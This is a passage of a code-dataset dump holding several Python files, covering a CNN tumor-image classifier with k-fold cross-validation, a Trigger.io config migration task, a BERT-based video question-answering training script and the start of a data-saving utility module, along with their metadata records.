np.concatenate((x_train, x_val))\ny_trainz = np.concatenate((y_train, y_val))\n\nx_train = x_trainz\ny_train = y_trainz\n\n\n\"\"\"## Normalizing the images.\"\"\"\nx_train = x_train.astype('float32')/255.\nx_test = x_test.astype('float32')/255.\n\n\n\"\"\"## What images do we have?\n\"\"\"\ndata_tumor_viz = x_train[:10]\ni = 0\nplt.figure(figsize = (25,25))\nfor image in data_tumor_viz:\n plt.subplot(4,5,i+1)\n i += 1\n plt.axis('off') # turning off the axes\n plt.imshow(image, cmap = 'gray')\n\nfor image in data_tumor_viz:\n print(image.shape)\n\nprint(\"We have\", sum(y_train==0),\"with no tumor in x_train and\", sum(y_train == 1), \"with a tumor\")\n\ndef model_1():\n adam = Adam(lr=0.0001) #LR of 0.001 LEADS TO OVERFITTING\n model = Sequential()\n model.add(layers.Conv2D(32,(4,4), activation = 'relu', input_shape = (224,224,3), name = 'conv1')) \n model.add(layers.MaxPooling2D((2, 2), name = 'maxpool1'))\n model.add(layers.Conv2D(64, (4,4), activation = 'relu', name = 'conv2'))\n model.add(layers.MaxPooling2D((2, 2), name = 'maxpool2'))\n model.add(layers.Flatten(name = 'flatten'))\n model.add(layers.Dense(64, activation = 'relu', kernel_regularizer=regularizers.l2(0.001), name = 'dense1'))\n #REMOVED BATCHNORM\n model.add(layers.Dropout(0.5, name = 'dropout'))\n model.add(layers.Dense(1, activation = 'sigmoid', name = 'dense2')) #SOFTMAX DOESNT TRAIN SOMEHOW, SO STICK WITH SIGMOID\n\t# Compile model\n model.compile(loss='binary_crossentropy', optimizer=adam, metrics=['accuracy'])\n return model\n \n\nmodel = model_1()\nmodel.summary()\n\nk = 5\nfolds = list(StratifiedKFold(n_splits=k, shuffle=True, random_state=1).split(x_train, y_train))\n\n\nimport os\nos.chdir('/content/drive/My Drive/Colab Notebooks/Submission 6dec thesis/')\n\ncvscores = []\nfor j, (train_idx, val_idx) in enumerate(folds,1):\n \n print('\\nFold ',j)\n X_train_cv = x_train[train_idx]\n y_train_cv = y_train[train_idx]\n X_valid_cv = x_train[val_idx]\n y_valid_cv= y_train[val_idx]\n \n model = model_1()\n history = model.fit(x_train[train_idx], y_train[train_idx], epochs=30, batch_size=32, validation_data = (X_valid_cv, y_valid_cv), shuffle = True)\n model.save('Model_1_fold_'+ str(j) + '.h5')\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.show()\n\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.show()\n scores = model.evaluate(X_valid_cv, y_valid_cv)\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n cvscores.append(scores[1] * 100)\nprint(\"%.2f%% (+/- %.2f%%)\" % (np.mean(cvscores), np.std(cvscores)))\n\n# Load the model from the best fold\nwd = os.getcwd()\n\nmodelfold1 = load_model('Model_1_fold_1.h5')\nmodelfold2 = load_model('Model_1_fold_2.h5')\nmodelfold3 = load_model('Model_1_fold_3.h5')\nmodelfold4 = load_model('Model_1_fold_4.h5')\nmodelfold5 = load_model('Model_1_fold_5.h5')\n\n\n\ndef multiple_predictions(test_data, list_of_models):\n predicts = []\n for i in list_of_models:\n predict_fold = i.predict(test_data)\n labeled = [1 if x > 0.5 else 0 for x in predict_fold]\n predicts.append(labeled)\n return predicts\n\ndef multiple_accuracies(test_labs, list_of_model_predictions):\n accuracies = []\n fold = 0\n for i in list_of_model_predictions:\n fold +=1\n accuracy = accuracy_score(test_labs, i)\n accuracies.append(accuracy)\n return accuracies\n\ndef multiple_conf_matrices(test_labs, list_of_model_predictions):\n confusions = []\n for i in list_of_model_predictions:\n confusion_mt = confusion_matrix(test_labs, i)\n confusions.append(confusion_mt)\n return confusions\n\ndef multiple_class_reports(test_labs, list_of_model_predictions):\n class_reps = []\n for i in list_of_model_predictions:\n class_rep = classification_report(test_labs, i)\n class_reps.append(class_rep)\n return class_reps\n\npreds = multiple_predictions(x_test, [modelfold1, modelfold2, modelfold3, modelfold4, modelfold5])\naccu = multiple_accuracies(y_test, preds)\nconf = multiple_conf_matrices(y_test, preds)\nclas = multiple_class_reports(y_test, preds)\n\nfold = 0\nfor i in accu:\n fold +=1\n print ('for fold', fold, 'the accuracy is', i)\nprint('the mean accuracy is ', round(np.mean(accu),2)*100, '%')\n\nfold = 0\nfor i in conf:\n fold +=1\n print('\\nfor fold', fold, 'the confusion matrix is\\n', i)\n\nfold = 0\nfor i in clas:\n fold +=1\n print('\\nfor fold', fold, 'the classification report is\\n', i )\n\nfrom sklearn.metrics import precision_score, recall_score\nprecscores = []\nrecscores = []\nf1scores = []\nfor i in preds:\n prec = precision_score(y_test, i)\n rec = recall_score(y_test,i)\n f1 = f1_score(y_test,i)\n precscores.append(prec)\n recscores.append(rec)\n f1scores.append(f1)\n \nprint(\"the average precision score is\", round(np.mean(precscores),2)*100, '%')\nprint(\"the average recall is\", round(np.mean(recscores),2)*100, '%')\nprint(\"the average F1 score is\", round(np.mean(f1scores),2)*100, '%')\n\n#Image classifications\ni = 0\nplt.figure(figsize = (25,25))\nfor image in x_test:\n plt.subplot(10,5,i+1)\n plt.axis('off') # turning off the axes\n plt.title(('Predicted', preds[i], 'real', y_test[i]))\n plt.imshow(image, cmap = 'gray')\n i += 1\n\n\n\n", "sub_path": "Thesis Janne/CNN/Model 1/CNN model_1 kfold.py", "file_name": "CNN model_1 kfold.py", "file_ext": "py", "file_size_in_byte": 6987, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.getcwd", "line_number": 27, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 28, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "keras.optimizers.Adam", "line_number": 87, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 88, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 89, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 89, "usage_type": "name"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 90, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 90, "usage_type": "name"}, {"api_name": "keras.layers.Conv2D", "line_number": 91, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 91, "usage_type": "name"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 92, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 92, "usage_type": "name"}, {"api_name": "keras.layers.Flatten", "line_number": 93, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 93, "usage_type": "name"}, {"api_name": "keras.layers.Dense", "line_number": 94, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 94, "usage_type": "name"}, {"api_name": "keras.regularizers.l2", "line_number": 94, "usage_type": "call"}, {"api_name": "keras.regularizers", "line_number": 94, "usage_type": "name"}, {"api_name": "keras.layers.Dropout", "line_number": 96, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 96, "usage_type": "name"}, {"api_name": "keras.layers.Dense", "line_number": 97, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 97, "usage_type": "name"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 107, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 143, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.models.load_model", "line_number": 148, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.models.load_model", "line_number": 149, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.models.load_model", "line_number": 150, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.models.load_model", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.models.load_model", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 169, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 176, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 196, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 213, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 214, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 230, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 230, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}]} +{"seq_id": "271220369", "text": "import json\nimport logging\nimport sys\nimport shutil\n\nfrom build import ConfigurationError\nfrom lib import task, BASE_EXCEPTION\n\nlog = logging.getLogger(__name__)\n\nclass MigrationError(BASE_EXCEPTION):\n\tpass\n\n@task\ndef migrate_config(build):\n\tfrom_platform_version = \"v1.2\"\n\tto_platform_version = \"v1.3\"\n\tfrom_config_version = \"1\"\n\tto_config_version = \"2\"\n\n\t# Check platform version\n\tif build.config['platform_version'] != from_platform_version:\n\t\traise MigrationError(\"'platform_version' in your src/config.json file is not set to '\"+from_platform_version+\"'\\nThis could mean you have already migrated, in which case you can run a build as normal, or it could mean your platform version is set to a specific minor version or custom version.\\n\\nIf you are not sure how to proceed contact support@trigger.io.\")\n\t\n\t# Check config version\n\tif \"config_version\" in build.config and build.config[\"from_config_version\"] != 1:\n\t\traise MigrationError(\"Config file version was expected to be: \"+from_config_version+\" however it was not.\\n\\nIf you are not sure how to proceed contact support@trigger.io.\")\n\t\n\t# Prompt\n\tinteractive = build.tool_config.get('general.interactive', True)\n\tif interactive:\n\t\tresp = raw_input(\"Your app will be migrated from platform version: \"+from_platform_version+\" to: \"+to_platform_version+\".\\n\\nThis migration will automatically update your 'src/config.json' file, further details are available from http://current-docs.trigger.io/release-notes.html\\n\\nPlease enter 'y' to continue or anything else to cancel:\\n\")\n\t\tif resp.lower() != \"y\":\n\t\t\traise MigrationError(\"User cancelled migration\")\n\t\t\treturn\n\n\t\n\t# Regenerate config\n\tdef copy_if_exists(key, from_dict, to_dict):\n\t\tif key in from_dict:\n\t\t\tto_dict[key] = from_dict[key]\n\t\t\t\n\tdef generate_icons(target, sizes, from_dict, to_dict):\n\t\tnew_target = {}\n\t\tfor size in sizes:\n\t\t\tif target in from_dict['icons'] and size in from_dict['icons'][target]:\n\t\t\t\tnew_target[size] = from_dict['icons'][target][size]\n\t\t\telif size in from_dict['icons']:\n\t\t\t\tnew_target[size] = from_dict['icons'][size]\n\t\t\n\t\t# Only save the icons if we have all the required sizes, else we'll cause a build failure\n\t\tif len(sizes) == len(new_target):\n\t\t\tto_dict['icons'][target] = new_target\n\t\n\tnew_config = {}\n\n\t# Add basic options\n\tnew_config['config_version'] = to_config_version\n\tnew_config['name'] = build.config['name']\n\tnew_config['author'] = build.config['author']\n\tcopy_if_exists('description', build.config, new_config)\n\tnew_config['platform_version'] = to_platform_version\n\tnew_config['version'] = build.config['version']\n\tcopy_if_exists('homepage', build.config, new_config)\n\n\t# Copy partners\n\tcopy_if_exists('partners', build.config, new_config)\n\t\n\t# Add default set of modules\n\tnew_config['modules'] = {\n\t\t\"contact\": True,\n\t\t\"event\": True,\n\t\t\"file\": True,\n\t\t\"geolocation\": True,\n\t\t\"is\": True,\n\t\t\"logging\": {\n\t\t\t\"level\": \"INFO\"\n\t\t},\n\t\t\"message\": True,\n\t\t\"notification\": True,\n\t\t\"prefs\": True,\n\t\t\"request\": {\n\t\t\t\"permissions\": []\n\t\t},\n\t\t\"sms\": True,\n\t\t\"tabs\": True,\n\t\t\"tools\": True\n\t}\n\t# Add any current modules\n\tif \"modules\" in build.config:\n\t\tfor module in build.config[\"modules\"]:\n\t\t\tnew_config[\"modules\"][module] = build.config[\"modules\"][module]\n\n\t# Add any custom module config from old config\n\tcopy_if_exists('update_url', build.config, new_config[\"modules\"])\n\tcopy_if_exists('parameters', build.config, new_config[\"modules\"])\n\tcopy_if_exists('package_names', build.config, new_config[\"modules\"])\n\tcopy_if_exists('logging', build.config, new_config[\"modules\"])\n\tcopy_if_exists('orientations', build.config, new_config[\"modules\"])\n\t\n\tif \"activations\" in build.config and len(build.config['activations']) != 0:\n\t\tnew_config['modules']['activations'] = build.config['activations']\n\tif \"background_files\" in build.config and len(build.config['background_files']) != 0:\n\t\tnew_config['modules']['background'] = { \"files\": build.config['background_files'] }\n\tif \"browser_action\" in build.config:\n\t\tnew_config['modules']['button'] = build.config['browser_action']\n\tif \"libs\" in build.config and \"gmail\" in build.config[\"libs\"]:\n\t\tnew_config['modules']['gmail'] = True\n\tif \"libs\" in build.config and \"jquery\" in build.config[\"libs\"]:\n\t\tnew_config['modules']['jquery'] = build.config[\"libs\"][\"jquery\"]\n\tif \"launch_images\" in build.config:\n\t\tnew_config['modules']['launchimage'] = build.config['launch_images']\n\tif \"permissions\" in build.config:\n\t\tperms = build.config['permissions']\n\t\tif \"tabs\" in perms:\n\t\t\tperms.remove(\"tabs\")\n\t\tif \"notifications\" in perms:\n\t\t\tperms.remove(\"notifications\")\n\t\tnew_config['modules']['request']['permissions'] = perms\n\n\t# Migrate icons\n\tif \"icons\" in build.config:\n\t\tnew_config[\"modules\"]['icons'] = {};\n\t\tgenerate_icons('android', ['36', '48', '72'], build.config, new_config[\"modules\"])\n\t\tgenerate_icons('chrome', ['16', '48', '128'], build.config, new_config[\"modules\"])\n\t\tgenerate_icons('firefox', ['32', '64'], build.config, new_config[\"modules\"])\n\t\tgenerate_icons('ios', ['57', '72', '114', '512'], build.config, new_config[\"modules\"])\n\t\tgenerate_icons('safari', ['32', '48', '64'], build.config, new_config[\"modules\"])\n\t\n\t# Backup config file\n\tshutil.copy2('src/config.json', 'src/config.json.bak')\n\t\n\t# Output new config\n\tnew_config_str = json.dumps(new_config, indent=4, sort_keys=True).replace(\" \", \"\\t\")\n\tf = open('src/config.json', 'w')\n\tf.write(new_config_str)\n\tf.close()\n\t\n\tlog.info(\"Migration complete, you should now be able to build as normal with the new platform version, see http://current-docs.trigger.io/release-notes.html for details of the changes made.\")", "sub_path": ".template/generate_dynamic/migrate_tasks.py", "file_name": "migrate_tasks.py", "file_ext": "py", "file_size_in_byte": 5567, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "lib.BASE_EXCEPTION", "line_number": 11, "usage_type": "name"}, {"api_name": "build.config", "line_number": 22, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 26, "usage_type": "attribute"}, {"api_name": "build.tool_config.get", "line_number": 30, "usage_type": "call"}, {"api_name": "build.tool_config", "line_number": 30, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 59, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 60, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 61, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 63, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 64, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 67, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 90, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 91, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 92, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 95, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 96, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 97, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 98, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 99, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 101, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 102, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 103, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 104, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 105, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 106, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 107, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 109, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 110, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 111, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 112, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 113, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 114, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 122, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 124, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 125, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 126, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 127, "usage_type": "attribute"}, {"api_name": "build.config", "line_number": 128, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 131, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 134, "usage_type": "call"}, {"api_name": "lib.task", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "462592358", "text": "import os\nfrom utils.utils import *\nfrom utils.opts import *\nimport torch.optim as optim\nfrom model.Model import Model\nfrom torch.utils.data import DataLoader\nfrom utils.dataloader import VideoDataset\nfrom model.transformer.Optim import ScheduledOptim\nfrom pytorch_pretrained_bert import BertTokenizer\n\ndef tokenize_text(tokenizer, list_text):\n \"\"\"\n :param tokenizer: Bert Tokenizer\n :param list_text: List of the raw texts/\n :return: batch tensor.\n \"\"\"\n tokens = [torch.LongTensor(tokenizer.convert_tokens_to_ids(tokenizer.tokenize(x))) for x in list_text]\n lengths = [len(_) for _ in tokens]\n\n # Padding the sentences into batch\n batch_tokens = torch.zeros(len(lengths), max(lengths))\n for idx, token in enumerate(tokens):\n batch_tokens[idx, 0:lengths[idx]] = tokens[idx]\n return batch_tokens.long()\n\ndef train(loader, model, optimizer, tokenizer, opt):\n # model.train()\n for epoch in range(opt['epochs']):\n iteration = 0\n\n for data in loader:\n torch.cuda.synchronize()\n\n # Batch * length * 1024\n fc_feats = data['fc_feats'].cuda()\n target = data['target'].cuda()\n question = data['question']\n question = tokenize_text(tokenizer,question).cuda()\n \n prob = model(fc_feats,question)\n \n \n# gt_answers = data['gt_answer']\n# ca_answer1 = data['ca_answer1']\n# ca_answer2 = data['ca_answer2']\n# ca_answer3 = data['ca_answer3']\n\n # Pre-process the captions using BERT tokenizer\n# gt_tokens = tokenize_text(tokenizer, gt_answers).cuda()\n# ca_tokens1 = tokenize_text(tokenizer, ca_answer1).cuda()\n# ca_tokens2 = tokenize_text(tokenizer, ca_answer2).cuda()\n# ca_tokens3 = tokenize_text(tokenizer, ca_answer3).cuda()\n\n # Feed into the model for training\n# prob, labels = model(fc_feats, gt_tokens, ca_tokens1, ca_tokens2, ca_tokens3)\n\n loss = torch.nn.functional.binary_cross_entropy_with_logits(prob.squeeze(1), target)\n\n # Backward loss and clip gradient\n loss.backward()\n optimizer.step_and_update_lr()\n torch.nn.utils.clip_grad_norm_(filter(lambda p: p.requires_grad, model.parameters()), 1)\n\n # update parameters\n loss_item = loss.item()\n torch.cuda.synchronize()\n iteration += 1\n\n print('iter %d (epoch %d), loss = %.6f' % (iteration, epoch, loss_item))\n\n if epoch % opt['save_checkpoint_every'] == 0:\n model_path = os.path.join(opt['checkpoint_path'], 'V2C_QA_Bert_Base_%d.pth' % epoch)\n model_info_path = os.path.join(opt['checkpoint_path'], 'model_score.txt')\n torch.save(model.state_dict(), model_path)\n print('model saved to %s' % model_path)\n\n # Save the logging information\n with open(model_info_path, 'a') as f:\n f.write('model_%d, loss: %.6f' % (epoch, loss_item))\n\n\ndef main(opt):\n dataset = VideoDataset(opt, 'train')\n dataloader = DataLoader(dataset, batch_size=opt['batch_size'], shuffle=True)\n\n model = Model()\n model = model.cuda()\n\n # Load pre-trained checkpoint\n # cap_state_dict = torch.load('./save/model_cap-att.pth')\n # model_dict = model.state_dict()\n # model_dict.update(cap_state_dict)\n # model.load_state_dict(model_dict)\n\n # Initialize the optimizer\n optimizer = ScheduledOptim(optim.Adam(filter(lambda x: x.requires_grad, model.parameters()),\n betas=(0.9, 0.98), eps=1e-09), 512, opt['warm_up_steps'])\n\n # Initialize the tokenizer\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)\n\n train(dataloader, model, optimizer, tokenizer, opt)\n\nif __name__ == '__main__':\n opt = parse_opt()\n opt = vars(opt)\n main(opt)", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 3956, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.optim.LongTensor", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.optim.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.optim.cuda.synchronize", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.optim.cuda", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 32, "usage_type": "name"}, {"api_name": "model.Model", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.optim.nn.functional.binary_cross_entropy_with_logits", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.optim.nn", "line_number": 57, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.optim.nn.utils.clip_grad_norm_", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.optim.nn", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 62, "usage_type": "name"}, {"api_name": "model.Model.parameters", "line_number": 62, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.optim.cuda.synchronize", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.optim.cuda", "line_number": 66, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 66, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.optim.save", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 74, "usage_type": "name"}, {"api_name": "model.Model.state_dict", "line_number": 74, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 74, "usage_type": "name"}, {"api_name": "utils.dataloader.VideoDataset", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 84, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 86, "usage_type": "name"}, {"api_name": "model.Model.Model", "line_number": 86, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 87, "usage_type": "name"}, {"api_name": "model.Model.cuda", "line_number": 87, "usage_type": "call"}, {"api_name": "model.transformer.Optim.ScheduledOptim", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 96, "usage_type": "name"}, {"api_name": "model.Model.parameters", "line_number": 96, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 96, "usage_type": "name"}, {"api_name": "pytorch_pretrained_bert.BertTokenizer.from_pretrained", "line_number": 100, "usage_type": "call"}, {"api_name": "pytorch_pretrained_bert.BertTokenizer", "line_number": 100, "usage_type": "name"}, {"api_name": "model.Model", "line_number": 102, "usage_type": "argument"}]} +{"seq_id": "417596892", "text": "import os\nimport logging\nfrom dataclasses import dataclass\nfrom deprecation import deprecated\n\nimport numpy as np\nimport scipy.signal\nfrom scipy import io as sio\nfrom slugify import slugify\nfrom typing import List, Tuple, Iterable, Union, Dict, Optional\nimport plotly.graph_objs as go\nimport json\nfrom igorwriter import IgorWave\nimport io\nfrom pathlib import Path\n\nlogger = logging.getLogger(__name__)\n\nfrom .core_util import get_data_index, get_matching_x, edit_params, sig_fig, decimate, FIR_filter, \\\n get_sweeprate, bin_data, get_bin_size, mean_data, center_data, resample_data, run_multithreaded, run_multiprocessed, \\\n ensure_list, order_list, my_round, get_project_root, Data1D, Data2D\nfrom .hdf_util import NotFoundInHdfError\n\nARRAY_LIKE = Union[np.ndarray, List, Tuple]\n\n\ndef set_default_logging(level_override=None):\n # logging.basicConfig(level=logging.INFO, format=f'%(threadName)s %(funcName)s %(lineno)d %(message)s')\n # logging.basicConfig(level=logging.INFO, force=True, format=f'%(levelname)s:%(module)s:%(lineno)d:%(funcName)s:%(message)s')\n root_logger = logging.getLogger()\n root_logger.handlers = [] # Probably a bad thing to be doing...\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n f'%(thread)d:%(process)d:%(levelname)s:%(module)s:%(lineno)d:%(funcName)s:%(message)s')\n handler.setFormatter(formatter)\n root_logger.addHandler(handler)\n if level_override:\n root_logger.setLevel(level_override)\n\n\ndef _save_to_checks(datas, names, file_path, fp_ext=None):\n assert type(datas) == list\n assert type(names) == list\n base, tail = os.path.split(file_path)\n if base != '':\n assert os.path.isdir(base) # Check points to existing folder\n if fp_ext is not None:\n if tail[-(len(fp_ext)):] != fp_ext:\n tail += fp_ext # add extension if necessary\n logger.warning(f'added \"{fp_ext}\" to end of file_path provided to make [{file_path}]')\n file_path = os.path.join(base, tail)\n return file_path\n\n\ndef save_to_mat(datas, names, file_path):\n file_path = _save_to_checks(datas, names, file_path, fp_ext='.mat')\n mat_data = dict(zip(names, datas))\n sio.savemat(file_path, mat_data)\n logger.info(f'saved 